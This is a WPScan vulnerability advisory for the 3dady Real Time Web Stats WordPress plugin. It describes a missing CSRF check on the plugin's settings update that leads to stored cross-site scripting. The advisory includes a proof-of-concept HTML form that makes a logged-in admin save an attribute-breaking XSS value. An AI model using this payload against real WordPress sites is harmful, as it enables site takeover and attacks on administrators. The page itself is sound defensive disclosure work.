WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

3dady Real Time Web Stats <= 1.0 - Stored Cross-Site Scripting via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of escaping, it could also lead to Stored Cross-Site Scripting issue

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin.php?page=3dady" method="POST">
    <input type="text" name="dady_submit_hidden" value="Y">
    <input type="text" name="dady_input_text" value='" autofocus onfocus=alert(/XSS/)>'>
    <input type="text" name="mth_submit_hidden" value="Y">
    <input type="text" name="dady2_input_text" value='XSS2'>
    <input type="submit" name="submit" value="Save+Changes">
</form>

Affects Plugins

3dady-real-time-web-stats
No known fix - plugin closed

References

URL
https://packetstormsecurity.com/files/168480/

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

UnD3sc0n0c1d0

Verified

Yes

WPVDB ID
36ee3733-28b3-48dd-ba1e-08b7bbe2fe2d

Timeline

Publicly Published

2022-09-23 (about 4 months ago)

Added

2022-09-27 (about 4 months ago)

Last Updated

2022-09-27 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin